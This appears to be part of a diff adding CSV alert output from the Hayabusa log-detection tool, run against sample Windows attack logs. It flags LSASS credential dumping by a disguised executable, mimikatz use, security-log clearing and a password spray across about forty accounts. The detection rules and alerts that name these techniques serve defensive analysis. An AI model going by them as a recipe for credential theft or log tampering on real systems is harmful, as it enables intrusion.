+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
+2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
+2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:celgee/mtoussain/psmith/jleytevidal/sanson/eskoudis/edygert/drook/cragoso/tbennett/bking/cdavis/ebooth/ssims/cfleener/jwright/jlake/thessman/econrad/jorchilles/bgreenwood/zmathis/rbowes/Administrator/bhostetler/sarmstrong/lpesce/lschifano/dpendolino/kperryman/jkulikowski/wstrzelec/mdouglas/gsalinas/baker/smisenar/dmashburn/bgalbraith/cspizor/cmoody/melliott IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,-
+2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
